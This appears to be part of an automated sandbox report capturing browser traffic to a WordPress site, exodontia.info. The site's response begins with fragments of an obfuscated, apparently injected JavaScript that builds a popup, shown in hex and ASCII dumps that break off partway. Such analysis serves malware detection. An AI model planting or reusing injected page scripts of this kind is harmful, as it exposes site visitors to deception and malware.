                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      85192.168.2.1649823142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:54 UTC657OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3A%2F&oit=4&cp=7&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      86192.168.2.1649825142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:54 UTC660OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3A%2F%2F&oit=4&cp=8&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      87192.168.2.1649826142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:56 UTC660OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3A%2F%2F&oit=4&cp=8&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:13:57 UTC2236INHTTP/1.1 302 Found
                                                                                                                                      Location: https://www.google.com/sorry/index?continue=https://www.google.com/complete/search%3Fclient%3Dchrome-omni%26gs_ri%3Dchrome-ext-ansg%26xssi%3Dt%26q%3Dhttps%253A%252F%252F%26oit%3D4%26cp%3D8%26pgcl%3D4%26gs_rn%3D42%26psi%3D8AFy-_Mu70iYE25H%26sugkey%3DAIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw&q=EgSaEGkkGOS2o7EGIjCmaJGHgovUfWRjXH8Pj2-h0Xnj2YYam9kuQWyZwsJyiENifDdJQm8gjzLit6Q1Bj8yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                                                      x-hallmonitor-challenge: CgsI5bajsQYQhqXBCRIEmhBpJA
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-2BhH-2i4QirvcHxbc1q_nA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                      Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                                                      Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                      Date: Wed, 24 Apr 2024 10:13:57 GMT
                                                                                                                                      Server: gws
                                                                                                                                      Content-Length: 619
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      Set-Cookie: 1P_JAR=2024-04-24-10; expires=Fri, 24-May-2024 10:13:57 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                                                                                      Set-Cookie: NID=513=QMjKJqsH6sErniQgdswIGuXIldkyVDSkOdaMI0byeLTYcdwfgf0yEEeTP7BzWHVUpoIC9pK2bCZTDt5Rt5cYDkX2ELBZaz8SPTl1jTHEvdq7RsBJ3bCFAQQy7amUKd7BKqE_MGWEEu4Dqk6dmB-zF_hsxEqQPRVv9M2bhpotP9Q; expires=Thu, 24-Oct-2024 10:13:56 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close
                                                                                                                                      2024-04-24 10:13:57 UTC619INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 63 6f 6d 70 6c 65 74 65 2f 73 65 61 72 63 68 25 33 46 63 6c
                                                                                                                                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/complete/search%3Fcl


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      88192.168.2.1649828142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:57 UTC663OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3A%2F%2Fex&oit=3&cp=10&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      89192.168.2.1649829142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:57 UTC664OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3A%2F%2Fexo&oit=3&cp=11&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      90192.168.2.1649830142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:57 UTC665OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3A%2F%2Fexod&oit=3&cp=12&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      91192.168.2.1649831142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:58 UTC667OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3A%2F%2Fexodon&oit=3&cp=14&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      92192.168.2.1649832142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:58 UTC669OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3A%2F%2Fexodonti&oit=3&cp=16&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      93192.168.2.1649833142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:58 UTC671OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3A%2F%2Fexodontia.&oit=3&cp=18&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      94192.168.2.1649834142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:58 UTC672OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3A%2F%2Fexodontia.i&oit=3&cp=19&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      95192.168.2.1649835142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:59 UTC673OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3A%2F%2Fexodontia.in&oit=3&cp=20&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      96192.168.2.1649836142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:59 UTC674OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3A%2F%2Fexodontia.inf&oit=3&cp=21&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      97192.168.2.1649838153.92.6.1424437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:00 UTC657OUTGET / HTTP/1.1
                                                                                                                                      Host: exodontia.info
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                      Sec-Fetch-User: ?1
                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:14:01 UTC696INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      x-powered-by: PHP/7.4.33
                                                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                                                      link: <https://exodontia.info/wp-json/>; rel="https://api.w.org/"
                                                                                                                                      link: <https://exodontia.info/wp-json/wp/v2/pages/22>; rel="alternate"; type="application/json"
                                                                                                                                      link: <https://exodontia.info/>; rel=shortlink
                                                                                                                                      server-timing: wp-before-template;dur=54.86
                                                                                                                                      transfer-encoding: chunked
                                                                                                                                      date: Wed, 24 Apr 2024 10:14:01 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      platform: hostinger
                                                                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:14:01 UTC672INData Raw: 31 30 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 0d 0a 66 75 6e 63 74 69 6f 6e 20 5f 30 78 34 32 65 31 28 29 7b 76 61 72 20 5f 30 78 37 36 33 37 63 34 3d 5b 27 65 64 67 65 27 2c 27 69 6e 73 65 72 74 41 64 6a 61 63 65 6e 74 48 54 4d 4c 27 2c 27 64 69 73 61 62 6c 65 64 27 2c 27 67 6c 6f 62 61 6c 5f 6e 61 6d 65 27 2c 27 73 65 74 41 74 74 72 69 62 75 74 65 27 2c 27 31 39 35 36 37 36 34 37 75 6f 54 65 4b 69 27 2c 27 6e 61 76 69 67 61 74 6f 72 49 6e 66 6f 27 2c 27 68 6f 73 74 27 2c 27 5b 64 61 74 61 2d 69 64 3d 5c 78 32 37 27 2c 27 62 72 6f 77 73 65 72 27 2c 27 3c 73 74 79 6c 65 5c 78 32 30 64 61 74 61 2d 69 64 3d 5c 78 32
                                                                                                                                      Data Ascii: 10000<!DOCTYPE html><html lang="en-GB"> <head><script>function _0x42e1(){var _0x7637c4=['edge','insertAdjacentHTML','disabled','global_name','setAttribute','19567647uoTeKi','navigatorInfo','host','[data-id=\x27','browser','<style\x20data-id=\x2
                                                                                                                                      2024-04-24 10:14:01 UTC14994INData Raw: 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 37 70 78 7d 2e 70 6f 70 75 70 5c 78 32 30 69 6d 67 7b 77 69 64 74 68 3a 33 32 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 35 70 78 7d 2e 70 6f 70 75 70 5c 78 32 30 73 70 61 6e 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 35 70 78 7d 2e 70 6f 70 75 70 5c 78 32 30 62 75 74 74 6f 6e 7b 70 61 64 64 69 6e 67 3a 30 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 38 37 34 63 66 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 70 61 64 64 69 6e 67 3a 38 70 78 5c 78 32 30 32 30 70 78 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69
                                                                                                                                      Data Ascii: serif;font-size:17px}.popup\x20img{width:32px;vertical-align:middle;margin-right:15px}.popup\x20span{padding-top:5px}.popup\x20button{padding:0;color:#fff;background-color:#3874cf;box-sizing:border-box;padding:8px\x2020px;text-decoration:none;display:inli
                                                                                                                                      2024-04-24 10:14:01 UTC16384INData Raw: 54 4b 71 34 58 6b 52 69 55 61 36 7a 55 54 6a 67 2e 77 6f 66 66 32 22 20 61 73 3d 22 66 6f 6e 74 22 20 74 79 70 65 3d 22 66 6f 6e 74 2f 77 6f 66 66 32 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 69 6d 70 6f 72 74 61 6e 63 65 3d 22 68 69 67 68 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6c 69 62 72 65 66 72 61 6e 6b 6c 69 6e 2f 76 31 34 2f 6a 69 7a 44 52 45 56 49 74 48 67 63 38 71 44 49 62 53 54 4b 71 34 58 6b 52 69 55 52 32 7a 63 4c 69 67 2e 77 6f 66 66 32 22 20 61 73 3d 22 66 6f 6e 74 22 20 74 79 70 65 3d 22 66 6f 6e 74 2f 77 6f 66 66 32 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 69 6d 70 6f 72 74 61 6e 63 65 3d 22 68 69 67 68 22 2f
                                                                                                                                      Data Ascii: TKq4XkRiUa6zUTjg.woff2" as="font" type="font/woff2" crossorigin importance="high"/><link rel="preload" href="https://fonts.gstatic.com/s/librefranklin/v14/jizDREVItHgc8qDIbSTKq4XkRiUR2zcLig.woff2" as="font" type="font/woff2" crossorigin importance="high"/
